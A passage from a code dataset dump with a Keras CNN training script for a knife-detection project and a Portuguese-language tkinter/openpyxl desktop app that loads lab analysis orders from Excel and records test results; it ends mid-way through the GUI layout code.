"call"}, {"api_name": "time.perf_counter", "line_number": 56, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "time.perf_counter", "line_number": 64, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 66, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 81, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 82, "usage_type": "call"}, 
{"api_name": "time.perf_counter", "line_number": 84, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 90, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 91, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 110, "usage_type": "attribute"}]} +{"seq_id": "18597768116", "text": "# Importing the Keras libraries and packages\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Convolution2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import Dense\n\n# Step 1 - Building the CNN\n\n# Initializing the CNN\nclassifier = Sequential()\n\n# First convolution layer and pooling\nclassifier.add(Convolution2D(32, (3, 3), input_shape=(200, 200, 1), activation='relu'))\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n# Second convolution layer and pooling\nclassifier.add(Convolution2D(32, (3, 3), activation='relu'))\n# input_shape is going to be the pooled feature maps from the previous convolution layer\nclassifier.add(MaxPooling2D(pool_size=(2, 2)))\n\n# Flattening the layers\nclassifier.add(Flatten())\n\n# Adding a fully connected layer\nclassifier.add(Dense(units=128, activation='relu'))\nclassifier.add(Dense(units=6, activation='softmax')) # softmax for more than 2\n\n# Compiling the CNN\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) # binary_crossentropy for more than 2\n\n\n# Step 2 - Preparing the train/test data and training the model\n\n# Code copied from - https://keras.io/preprocessing/image/\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True)\n\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\ntraining_set = train_datagen.flow_from_directory('data/train',\n target_size=(200, 200),\n batch_size=5,\n color_mode='grayscale',\n class_mode='binary')\n\ntest_set = test_datagen.flow_from_directory('data/test',\n target_size=(200, 200),\n batch_size=5,\n 
color_mode='grayscale',\n class_mode='binary') \n\nSTEP_SIZE_TRAIN=training_set.n\nSTEP_SIZE_TEST=test_set.n\n\nclassifier.fit(\n training_set,\n epochs=1,\n validation_data=test_set)\n\n\n# Saving the model\nmodel_json = classifier.to_json()\nwith open(\"./models/model-bw.json\", \"w\") as json_file:\n json_file.write(model_json)\nclassifier.save_weights('./models/model-bw.h5')\n\n", "repo_name": "inPhamous/knife-detection", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2580, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tensorflow.keras.models.Sequential", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Convolution2D", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Convolution2D", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.ImageFile.LOAD_TRUNCATED_IMAGES", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PIL.ImageFile", "line_number": 38, "usage_type": "name"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "20096934797", "text": "from tkinter import * \nfrom tkinter import messagebox, ttk\nfrom openpyxl import *\nimport datetime, os, sys, getpass\n\nroot = Tk()\nroot.title(\"Analisa FO v1.2.0\")\n\nroot.state('zoomed')\n\n# Changing to the directory\nos.chdir(r\"\\\\polarsu2\\Geqma\\Engenharia da Qualidade\\Laudos\\FO\\APP\\BASE DADOS\")\n\nemptyRow = None\ndefinedRow = False\n\nfoNumber = \"\"\narriveDate = \"\"\narriveHour = \"\"\ndeliveringDate = \"\"\ndeliveringHour = \"\"\ndefect = \"\"\ntestType = \"\"\nfoTest = \"\"\nnumberOfTestingPoints = 0\nregister = \"\"\ncomment = \"\"\nidString = \"\"\n\nanalisedFos = []\n\nwb = load_workbook(\"results.xlsx\")\nresultSheet = wb[\"resultsSheet\"]\n\nfor b in range(2, 1048576):\n\te = resultSheet.cell(row=b, column=5)\n\n\tif e.value != None and e.value != \"\":\n\t\tanalisedFos.append(e.value)\n\telse:\n\t\tbreak\t\n\nwb.close()\n\nprint(\"Analised FOs\")\n\nregisteredFos = []\ncomboBoxTextValues = []\n\nfoNumberValues = []\narriveDateValues = []\narriveHourValues = []\ndeliveringDateValues = []\ndeliveringHourValues = []\ndefectValues = []\ntestTypeValues = []\nvaluesList = []\nnumberOfTestingPointsValues = []\nregisterValues = []\ncommentValues = []\nidValues = []\n\nregisteredFoNumberValues = []\nregisteredArriveDateValues = []\nregisteredArriveHourValues = []\nregisteredDeliveringDateValues = []\nregisteredDeliveringHourValues = []\nregisteredDefectValues = []\nregisteredTestTypeValues = []\nregisteredValuesList = []\nregisteredNumberOfTestingPointsValues = []\nregisteredRegisterValues = []\nregisteredCommentValues = []\nregisteredIdValues = []\n\ntestingPointsLabelList = {}\ntestingPointsEntryList = {}\n\nresultList = {}\n\nanalised = []\n\nwb = load_workbook(\"db.xlsx\")\nws = 
wb[\"fosParaAnalise\"]\n\nfor z in range(2,1048576):\n\t# 1048576 is the max number of rows in excel\n\ta = ws.cell(row=z, column=1)\n\tb = ws.cell(row=z, column=2)\n\tc = ws.cell(row=z, column=3)\n\td = ws.cell(row=z, column=4)\n\te = ws.cell(row=z, column=5)\n\tf = ws.cell(row=z, column=6)\n\tg = ws.cell(row=z, column=7)\n\th = ws.cell(row=z, column=8)\n\tI = ws.cell(row=z, column=9)\n\tj = ws.cell(row=z, column=10)\n\tk = ws.cell(row=z, column=11)\n\tl = ws.cell(row=z, column=12)\n\t\n\tif l.value != None and l.value != \"\":\n\n\t\tif l.value not in analisedFos:\n\t\t\n\t\t\tregisteredFos.append(a.value)\n\t\t\tcomboBoxTextValues.append(a.value)\n\n\t\t\tregisteredFoNumberValues.append(a.value)\n\t\t\tfoNumberValues.append(a.value)\n\n\t\t\tregisteredArriveDateValues.append(b.value)\n\t\t\tarriveDateValues.append(b.value)\n\t\t\t\n\t\t\tregisteredArriveHourValues.append(c.value)\n\t\t\tarriveHourValues.append(c.value)\n\n\t\t\tregisteredDeliveringDateValues.append(d.value)\n\t\t\tdeliveringDateValues.append(d.value)\n\n\t\t\tregisteredDeliveringHourValues.append(e.value)\n\t\t\tdeliveringHourValues.append(e.value)\n\n\t\t\tregisteredDefectValues.append(f.value)\n\t\t\tdefectValues.append(f.value)\n\n\t\t\tregisteredTestTypeValues.append(g.value)\n\t\t\ttestTypeValues.append(g.value)\n\n\t\t\tregisteredNumberOfTestingPointsValues.append(h.value)\n\t\t\tnumberOfTestingPointsValues.append(h.value)\n\t\t\t\n\t\t\tregisteredRegisterValues.append(I.value)\n\t\t\tregisterValues.append(I.value)\n\n\t\t\tregisteredCommentValues.append(j.value)\n\t\t\tcommentValues.append(j.value)\n\n\t\t\tregisteredValuesList.append(k.value)\n\t\t\tvaluesList.append(k.value)\n\n\t\t\tregisteredIdValues.append(l.value)\n\t\t\tidValues.append(l.value)\n\n\telif l.value == None or l.value == \"\":\n\t\t# print(\"Lists Built...\")\n\t\tbreak\n\nwb.close()\n\n# print(f\"valuesList: {idValues}\")\nprint(f\"valuesList length: {len(idValues)}\")\n\n# print(\"Final List:\", valuesList)\n\n# print(\"Tests:\", testTypeValues)\n\n# close the db.xlsx, and open the results.xlsx\nwb.close()\n\nwb = load_workbook(\"results.xlsx\")\nresultSheet = wb[\"resultsSheet\"]\n\ndef saveTestResults():\n\tglobal foNumber\n\tglobal defect\n\tglobal testType\n\tglobal resultList\n\tglobal definedRow\n\tglobal emptyRow\n\n\tif testType != \"000-TESTES DE COR\":\n\n\t\tfor index in range(numberOfTestingPoints):\n\t\t\tresultList[index] = testingPointsEntryList[index].get()\n\t\t\n\t\tif analistNameEntry.get() != \"\":\n\t\t\n\t\t\tif testingPointsEntryList[index].get() != \"\" and testingPointsEntryList[0].get() != \"\":\t\t\n\t\t\t\tif definedRow == False:\n\t\t\t\t\tfor i in range(2,1048576):\n\t\t\t\t\t\t# 1048576 is the max number of rows in excel\n\t\t\t\t\t\tc = resultSheet.cell(row=i, column=1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif c.value == None or c.value == \"\":\n\t\t\t\t\t\t\temptyRow = i\n\t\t\t\t\t\t\tdefinedRow = True\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t# print('Got Empty Row...')\n\t\t\t\t# print('Empty Row:',emptyRow)\n\n\t\t\t\tdate = str(datetime.datetime.now().date().strftime(\"%d-%m-%Y\"))\n\t\t\t\ttime = str(datetime.datetime.now().time())\t\n\n\t\t\t\tresultSheet.cell(row=emptyRow, column=1).value = foNumber\t\n\t\t\t\tresultSheet.cell(row=emptyRow, column=2).value = defect\n\t\t\t\tresultSheet.cell(row=emptyRow, column=3).value = register[:16]\n\t\t\t\tresultSheet.cell(row=emptyRow, column=4).value = comment\n\t\t\t\tresultSheet.cell(row=emptyRow, column=5).value = idString\n\t\t\t\tresultSheet.cell(row=emptyRow, column=6).value 
= analistNameEntry.get()\n\t\t\t\tresultSheet.cell(row=emptyRow, column=7).value = str(getpass.getuser())\n\t\t\t\tresultSheet.cell(row=emptyRow, column=8).value = date + \" \" + time[:8]\n\t\t\t\tresultSheet.cell(row=emptyRow, column=9).value = testType\n\t\t\t\tresultSheet.cell(row=emptyRow, column=10).value = foTest\n\t\t\t\tresultSheet.cell(row=emptyRow, column=11).value = numberOfTestingPoints\n\n\t\t\t\tfor index in range(numberOfTestingPoints):\n\t\t\t\t\tcolumnPosition = index + 12\n\t\t\t\t\tresultSheet.cell(row=emptyRow, column=columnPosition).value = resultList[index]\n\n\t\t\t\t# print(resultList)\t\t\t\t\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\twb.save(\"results.xlsx\")\n\t\t\t\t\tmessagebox.showinfo(\"Sucesso\", \"Resultados cadastrados com sucesso.\")\n\n\t\t\t\t\t# clearEntries\n\t\t\t\t\tfor i in range(numberOfTestingPoints):\n\t\t\t\t\t\ttestingPointsEntryList[i].delete(0, END)\t\t\t\t\n\n\t\t\t\t\tanalised.append(idString)\n\t\t\t\t\t\n\t\t\t\t\tother_index\t= idValues.index(idString)\n\n\t\t\t\t\tidValues.remove(idString)\n\n\t\t\t\t\tdel foNumberValues[other_index]\n\t\t\t\t\tdel arriveDateValues[other_index]\n\t\t\t\t\tdel arriveHourValues[other_index]\n\t\t\t\t\tdel deliveringDateValues[other_index]\n\t\t\t\t\tdel deliveringHourValues[other_index]\n\t\t\t\t\tdel defectValues[other_index]\n\t\t\t\t\tdel testTypeValues[other_index]\n\t\t\t\t\tdel numberOfTestingPointsValues[other_index]\n\t\t\t\t\tdel registerValues[other_index]\n\t\t\t\t\tdel commentValues[other_index]\n\t\t\t\t\tdel valuesList[other_index]\n\t\t\t\t\t\n\t\t\t\t\tdefinedRow = False\n\n\t\t\t\t\tprint(f\"Saved: valuesList length: {len(valuesList)}\")\n\t\t\t\t\t# print(idValues)\n\n\t\t\t\t\tgoBack()\t\n\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e)\n\t\t\t\t\tmessagebox.showerror(\"Erro\", \"Não foi possível fazer o cadastro, a planilha está aberta em outro lugar.\\nFeche-a e tente novamente.\")\n\n\t\t\telse:\n\t\t\t\t# print(\"There is a test missing...\")\n\t\t\t\tmessagebox.showerror(\"Erro\", \"Preencha todos os campos.\")\t\n\n\t\telse:\n\t\t\tmessagebox.showerror(\"Erro\", \"Digite seu Nome.\")\n\t\n\telif testType == \"000-TESTES DE COR\":\n\n\t\tif analistNameEntry.get() != \"\":\n\n\t\t\tentriesList = [entryLuminTela.get(),\n\t\t\t\tentryCoordATela.get(),\n\t\t\t\tentryCoordBTela.get(),\n\t\t\t\tentryAlvuraISOTela.get(),\n\t\t\t\tentryBrancuraTela.get(),\n\t\t\t\tentryOpacidadeTela.get(),\n\t\t\t\tentryFluorescenciaTela.get(),\n\t\t\t\tentryAlvuraD65Tela.get(),\t\t\t\t\n\t\t\t\tentryLuminFeltro.get(),\n\t\t\t\tentryCoordAFeltro.get(),\n\t\t\t\tentryCoordBFeltro.get(),\n\t\t\t\tentryAlvuraISOFeltro.get(),\n\t\t\t\tentryBrancuraFeltro.get(),\n\t\t\t\tentryOpacidadeFeltro.get(),\n\t\t\t\tentryFluorescenciaFeltro.get(),\n\t\t\t\tentryAlvuraD65TelaFeltro.get()\t\t\t\t\n\t\t\t]\n\t\t\t\n\t\t\tif \"\" not in entriesList:\n\t\t\t\t\n\t\t\t\tif definedRow == False:\n\t\t\t\t\tfor i in range(2,1048576):\n\t\t\t\t\t\t# 1048576 is the max number of rows in excel\n\t\t\t\t\t\tc = resultSheet.cell(row=i, column=1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif c.value == None or c.value == \"\":\n\t\t\t\t\t\t\temptyRow = i\n\t\t\t\t\t\t\tdefinedRow = True\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\tdate = str(datetime.datetime.now().date().strftime(\"%d-%m-%Y\"))\n\t\t\t\ttime = str(datetime.datetime.now().time())\t\n\n\t\t\t\tresultSheet.cell(row=emptyRow, column=1).value = foNumber\t\n\t\t\t\tresultSheet.cell(row=emptyRow, column=2).value = defect\n\t\t\t\tresultSheet.cell(row=emptyRow, column=3).value = 
register[:16]\n\t\t\t\tresultSheet.cell(row=emptyRow, column=4).value = comment\n\t\t\t\tresultSheet.cell(row=emptyRow, column=5).value = idString\n\t\t\t\tresultSheet.cell(row=emptyRow, column=6).value = analistNameEntry.get()\n\t\t\t\tresultSheet.cell(row=emptyRow, column=7).value = str(getpass.getuser())\n\t\t\t\tresultSheet.cell(row=emptyRow, column=8).value = date + \" \" + time[:8]\n\t\t\t\tresultSheet.cell(row=emptyRow, column=9).value = testType \n\t\t\t\tresultSheet.cell(row=emptyRow, column=10).value = foTest\n\t\t\t\tresultSheet.cell(row=emptyRow, column=11).value = numberOfTestingPoints\n\n\t\t\t\tfor n in range(len(entriesList)):\n\t\t\t\t\tcolumnPosition = n + 42\n\t\t\t\t\tresultSheet.cell(row=emptyRow, column=columnPosition).value = entriesList[n]\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\twb.save(\"results.xlsx\")\n\t\t\t\t\tmessagebox.showinfo(\"Sucesso\", \"Resultados cadastrados com sucesso.\")\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tanalised.append(idString)\n\n\t\t\t\t\tother_index\t= idValues.index(idString)\n\n\t\t\t\t\tidValues.remove(idString)\n\n\t\t\t\t\tdel foNumberValues[other_index]\n\t\t\t\t\tdel arriveDateValues[other_index]\n\t\t\t\t\tdel arriveHourValues[other_index]\n\t\t\t\t\tdel deliveringDateValues[other_index]\n\t\t\t\t\tdel deliveringHourValues[other_index]\n\t\t\t\t\tdel defectValues[other_index]\n\t\t\t\t\tdel testTypeValues[other_index]\n\t\t\t\t\tdel numberOfTestingPointsValues[other_index]\n\t\t\t\t\tdel registerValues[other_index]\n\t\t\t\t\tdel commentValues[other_index]\n\t\t\t\t\tdel valuesList[other_index]\n\t\t\t\t\t\n\t\t\t\t\tdefinedRow = False\n\n\t\t\t\t\tprint(f\"Saved: valuesList length: {len(valuesList)}\")\n\t\t\t\t\t# print(idValues)\n\n\t\t\t\t\tgoBack()\t\n\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e)\n\t\t\t\t\tmessagebox.showerror(\"Erro\", \"Não foi possível fazer o cadastro, a planilha está aberta em outro lugar.\\nFeche-a e tente novamente.\\n\" + str(e))\n\t\t\t\t\t\t\t\n\t\t\telse:\n\t\t\t \tmessagebox.showerror(\"Erro\", \"Preencha todos os campos.\")\t\t\t\n\t\telse:\n\t\t\tmessagebox.showerror(\"Erro\", \"Digite seu Nome.\")\t\t\t\t\n\ndef goBack():\n\tglobal secondWindow\n\tglobal master_frame\n\tglobal foNumberBox\n\n\tif testType != \"000-TESTES DE COR\":\n\t\tfor i in range(numberOfTestingPoints):\n\t\t\ttestingPointsLabelList[i].destroy()\n\t\t\ttestingPointsEntryList[i].destroy()\n\n\telif testType == \"000-TESTES DE 
COR\":\n\t\t\n\t\tentryLuminTela.delete(0,END)\n\t\tentryCoordATela.delete(0,END)\n\t\tentryCoordBTela.delete(0,END)\n\t\tentryAlvuraISOTela.delete(0,END)\n\t\tentryOpacidadeTela.delete(0,END)\n\t\tentryFluorescenciaTela.delete(0,END)\n\t\tentryBrancuraTela.delete(0,END)\n\t\tentryAlvuraD65Tela.delete(0,END)\n\n\t\tentryLuminFeltro.delete(0,END)\n\t\tentryCoordAFeltro.delete(0,END)\n\t\tentryCoordBFeltro.delete(0,END)\n\t\tentryAlvuraISOFeltro.delete(0,END)\n\t\tentryBrancuraFeltro.delete(0,END)\n\t\tentryOpacidadeFeltro.delete(0,END)\n\t\tentryFluorescenciaFeltro.delete(0,END)\n\t\tentryAlvuraD65TelaFeltro.delete(0,END)\n\n\t\tentryLuminTela.grid_forget()\n\t\tentryCoordATela.grid_forget()\n\t\tentryCoordBTela.grid_forget()\n\t\tentryAlvuraISOTela.grid_forget()\n\t\tentryOpacidadeTela.grid_forget()\n\t\tentryFluorescenciaTela.grid_forget()\n\t\tentryBrancuraTela.grid_forget()\n\t\tentryAlvuraD65Tela.grid_forget()\n\t\tlabelLuminTela.grid_forget()\n\t\tlabelCoordATela.grid_forget()\n\t\tlabelCoordBTela.grid_forget()\n\t\tlabelAlvuraISOTela.grid_forget()\n\t\tlabelOpacidadeTela.grid_forget()\n\t\tlabelFluorescenciaTela.grid_forget()\n\t\tlabelBrancuraTela.grid_forget()\n\t\tlabelAlvuraD65Tela.grid_forget()\n\n\t\tentryLuminFeltro.grid_forget()\n\t\tentryCoordAFeltro.grid_forget()\n\t\tentryCoordBFeltro.grid_forget()\n\t\tentryAlvuraISOFeltro.grid_forget()\n\t\tentryBrancuraFeltro.grid_forget()\n\t\tentryOpacidadeFeltro.grid_forget()\n\t\tentryFluorescenciaFeltro.grid_forget()\n\t\tentryAlvuraD65TelaFeltro.grid_forget()\n\t\tlabelLuminFeltro.grid_forget()\n\t\tlabelCoordAFeltro.grid_forget()\n\t\tlabelCoordBFeltro.grid_forget()\n\t\tlabelAlvuraISOFeltro.grid_forget()\n\t\tlabelBrancuraFeltro.grid_forget()\n\t\tlabelOpacidadeFeltro.grid_forget()\n\t\tlabelFluorescenciaFeltro.grid_forget()\n\t\tlabelAlvuraD65TelaFeltro.grid_forget()\n\n\ttestLabel['text'] = \"\"\n\tarriveDateLabel1[\"text\"] = \"\"\n\tarriveHourLabel1[\"text\"] = \"\"\n\t\n\tdeliveringDateLabel1[\"text\"] = \"\"\n\tdeliveringDateLabel1[\"text\"] = \"\"\n\t\n\tdeliveringHourLabel1[\"text\"] = \"\"\t\n\tdeliveringHourLabel1[\"text\"] = \"\"\n\t\n\tdefectLabel1[\"text\"] = \"\"\n\ttestTypeLabel1[\"text\"] = \"\"\n\tnumberOfTestingPointsLabel1[\"text\"] = \"\"\n\tcommentLabel1[\"text\"] = \"\"\n\t\n\tfoNumberBox.set(\"\")\n\n\tanalyseButton['state'] = DISABLED\n\t\t\n\tsecondWindow.pack_forget()\n\tmaster_frame.pack()\n\ndef updateCombobox():\t\n\tglobal registeredFos\n\n\tglobal comboBoxTextValues\n\n\tglobal registeredFoNumberValues\n\tglobal foNumberValues\n\n\tglobal registeredArriveDateValues\n\tglobal arriveDateValues\n\t\n\tglobal registeredArriveHourValues\n\tglobal arriveHourValues\n\n\tglobal registeredDeliveringDateValues\n\tglobal deliveringDateValues\n\n\tglobal registeredDeliveringHourValues\n\tglobal deliveringHourValues\n\n\tglobal registeredDefectValues\n\tglobal defectValues\n\n\tglobal registeredTestTypeValues\n\tglobal testTypeValues\n\n\tglobal registeredNumberOfTestingPointsValues\n\tglobal numberOfTestingPointsValues\n\t\n\tglobal registeredRegisterValues\n\tglobal registerValues\n\n\tglobal registeredCommentValues\n\tglobal commentValues\n\n\tglobal registeredValuesList\n\tglobal valuesList\n\n\tglobal registeredIdValues\n\tglobal idValues\n\n\twb = load_workbook(\"db.xlsx\")\n\tws = wb[\"fosParaAnalise\"]\n\n\tfor z in range(2,1048576):\n\t\t# 1048576 is the max number of rows in excel\n\t\ta = ws.cell(row=z, column=1)\n\t\tb = ws.cell(row=z, column=2)\n\t\tc = ws.cell(row=z, column=3)\n\t\td = 
ws.cell(row=z, column=4)\n\t\te = ws.cell(row=z, column=5)\n\t\tf = ws.cell(row=z, column=6)\n\t\tg = ws.cell(row=z, column=7)\n\t\th = ws.cell(row=z, column=8)\n\t\tI = ws.cell(row=z, column=9)\n\t\tj = ws.cell(row=z, column=10)\n\t\tk = ws.cell(row=z, column=11)\n\t\tl = ws.cell(row=z, column=12)\n\t\t\n\t\tif l.value != None and l.value != \"\":\n\t\t\t\n\t\t\tif l.value not in analisedFos and l.value not in idValues and l.value not in analised:\n\t\t\t\tregisteredFos.append(a.value)\n\t\t\t\tcomboBoxTextValues.append(a.value)\n\n\t\t\t\tregisteredFoNumberValues.append(a.value)\n\t\t\t\tfoNumberValues.append(a.value)\n\n\t\t\t\tregisteredArriveDateValues.append(b.value)\n\t\t\t\tarriveDateValues.append(b.value)\n\t\t\t\t\n\t\t\t\tregisteredArriveHourValues.append(c.value)\n\t\t\t\tarriveHourValues.append(c.value)\n\n\t\t\t\tregisteredDeliveringDateValues.append(d.value)\n\t\t\t\tdeliveringDateValues.append(d.value)\n\n\t\t\t\tregisteredDeliveringHourValues.append(e.value)\n\t\t\t\tdeliveringHourValues.append(e.value)\n\n\t\t\t\tregisteredDefectValues.append(f.value)\n\t\t\t\tdefectValues.append(f.value)\n\n\t\t\t\tregisteredTestTypeValues.append(g.value)\n\t\t\t\ttestTypeValues.append(g.value)\n\n\t\t\t\tregisteredNumberOfTestingPointsValues.append(h.value)\n\t\t\t\tnumberOfTestingPointsValues.append(h.value)\n\t\t\t\t\n\t\t\t\tregisteredRegisterValues.append(I.value)\n\t\t\t\tregisterValues.append(I.value)\n\n\t\t\t\tregisteredCommentValues.append(j.value)\n\t\t\t\tcommentValues.append(j.value)\n\n\t\t\t\tregisteredValuesList.append(k.value)\n\t\t\t\tvaluesList.append(k.value)\n\n\t\t\t\tregisteredIdValues.append(l.value)\n\t\t\t\tidValues.append(l.value)\n\n\t\telif l.value == None or l.value == \"\":\n\t\t\tprint(\"Lists Rebuilt...\")\n\t\t\tprint(f\"valuesList length: {len(idValues)}\")\n\t\t\tbreak\n\n\twb.close()\n\n\ttestLabel['text'] = \"\"\n\tarriveDateLabel1[\"text\"] = \"\"\n\tarriveHourLabel1[\"text\"] = \"\"\n\t\n\tdeliveringDateLabel1[\"text\"] = \"\"\n\tdeliveringDateLabel1[\"text\"] = \"\"\n\t\n\tdeliveringHourLabel1[\"text\"] = \"\"\t\n\tdeliveringHourLabel1[\"text\"] = \"\"\n\t\n\tdefectLabel1[\"text\"] = \"\"\n\ttestTypeLabel1[\"text\"] = \"\"\n\tnumberOfTestingPointsLabel1[\"text\"] = \"\"\n\tcommentLabel1[\"text\"] = \"\"\n\t\n\t# print(\"This is the Final Values List:\", valuesList)\n\tfoNumberBox[\"values\"] = valuesList\n\t\ndef createTestResultEntriesWindow():\n\tglobal testingPointsLabelList\n\tglobal testingPointsEntryList\n\n\tmaster_frame.pack_forget()\n\tsecondWindow.pack()\t\t\t\n\n\tlabelColumn = 0\n\tentryColumn = 1\n\n\tbackButtonColumn = 0\n\tsaveButtonColumn = 1\n\tbuttonsColumnSpan = 1\n\n\tlabelEntryRow = 0\n\n\tbuttonsRow = 0\n\n\tfirstLabel = Label(secondWindow, text=\"Insira seu nome e os resultados da Análise.\")\n\tfirstLabel.grid(row=0, column=0, columnspan=2, padx=xpadding, pady=15)\n\n\tanalistNameLabel = Label(secondWindow, text=\"Insira seu Nome:\")\n\tanalistNameLabel.grid(row=1, column=0, padx=xpadding, pady=ypadding)\n\n\tanalistNameEntry.grid(row=1, column=1, padx=xpadding, pady=ypadding)\n\n\ttestLabel.grid(row=2, column=0, columnspan=2, sticky=W, padx=xpadding, pady=ypadding)\n\ttestLabel['text'] = \"Tipo de Analise: \" + testType\n\n\tif testType == \"000-TESTES DE COR\":\n\t\tprint(\"Teste de Cor...\")\n\t\t\n\t\tlabelLuminTela.grid(row=3, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryLuminTela.grid(row=3, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelCoordATela.grid(row=4, column=0, sticky=W, 
padx=xpadding, pady=ypadding)\t\t\n\t\tentryCoordATela.grid(row=4, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelCoordBTela.grid(row=5, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryCoordBTela.grid(row=5, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelAlvuraISOTela.grid(row=6, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryAlvuraISOTela.grid(row=6, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelBrancuraTela.grid(row=7, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryBrancuraTela.grid(row=7, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelOpacidadeTela.grid(row=8, column=0, sticky=W, padx=xpadding, pady=ypadding)\n\t\tentryOpacidadeTela.grid(row=8, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tlabelFluorescenciaTela.grid(row=9, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryFluorescenciaTela.grid(row=9, column=1, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\t\n\t\tlabelAlvuraD65Tela.grid(row=10, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryAlvuraD65Tela.grid(row=10, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tlabelLuminFeltro.grid(row=11, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryLuminFeltro.grid(row=11, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelCoordAFeltro.grid(row=12, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryCoordAFeltro.grid(row=12, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelCoordBFeltro.grid(row=13, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryCoordBFeltro.grid(row=13, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelAlvuraISOFeltro.grid(row=14, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryAlvuraISOFeltro.grid(row=14, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\t\t\n\t\tlabelBrancuraFeltro.grid(row=15, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryBrancuraFeltro.grid(row=15, column=1, sticky=W, padx=xpadding, 